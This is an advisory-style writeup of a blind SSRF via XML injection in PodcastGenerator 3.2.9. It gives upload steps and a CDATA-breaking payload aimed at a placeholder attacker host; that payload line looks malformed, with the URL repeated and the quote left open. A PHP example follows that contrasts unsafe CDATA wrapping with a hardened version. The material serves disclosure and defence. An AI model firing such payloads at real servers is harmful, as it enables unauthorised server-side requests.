#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
#Application: PodcastGenerator
#Version: v3.2.9
#Bugs: Blind SSRF via XML Injection
#Technology: PHP
#Vendor URL: https://podcastgenerator.net/
#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
#Date of found: 01-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php)
2. Fill in all sections and set the Short Description section to 'test]]>( example :Attacker domain)http://localhost:3132http://localhost:3132http://localhost:3132
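
The `]]>` at the start of the Short Description value closes a CDATA section early, so whatever follows is parsed as feed markup. The PHP below is an added example, not PodcastGenerator's own code: it puts the unsafe wrapping beside a hardened one and checks the result with a parser. The function names, the `item`/`description` layout, the `marker` element and the sample input are assumptions made for illustration.

```php
<?php
// Added example, not PodcastGenerator code. All names here are hypothetical.

// Unsafe pattern: user text goes into a CDATA section unchanged, so a "]]>"
// inside it ends the section and the remainder is parsed as markup.
function build_item_unsafe(string $shortDesc): string
{
    return "<item><description><![CDATA[" . $shortDesc . "]]></description></item>";
}

// Hardened pattern: split every "]]>" across two CDATA sections so the
// terminator never appears inside user-controlled text.
// (Dropping CDATA and using htmlspecialchars($s, ENT_XML1 | ENT_QUOTES) also works.)
function build_item_safe(string $shortDesc): string
{
    $escaped = str_replace("]]>", "]]]]><![CDATA[>", $shortDesc);
    return "<item><description><![CDATA[" . $escaped . "]]></description></item>";
}

// Check: list every element name in the generated fragment. Anything other
// than item and description means user input became markup.
function element_names(string $xml): array
{
    $doc = new DOMDocument();
    // LIBXML_NONET stops the parser itself from fetching network resources.
    if (!$doc->loadXML($xml, LIBXML_NONET)) {
        return ['<unparseable>'];
    }
    $names = [];
    foreach ($doc->getElementsByTagName('*') as $el) {
        $names[] = $el->nodeName;
    }
    return $names;
}

// Constructed input: CDATA terminator, a harmless marker element, and a
// CDATA re-open so the unsafe output stays well formed.
$input = 'test]]><marker/><![CDATA[';

echo "unsafe: ", implode(', ', element_names(build_item_unsafe($input))), PHP_EOL;
echo "safe:   ", implode(', ', element_names(build_item_safe($input))), PHP_EOL;
```

In the hardened output the parser still reads the original text back from the description element, so nothing the user typed is lost.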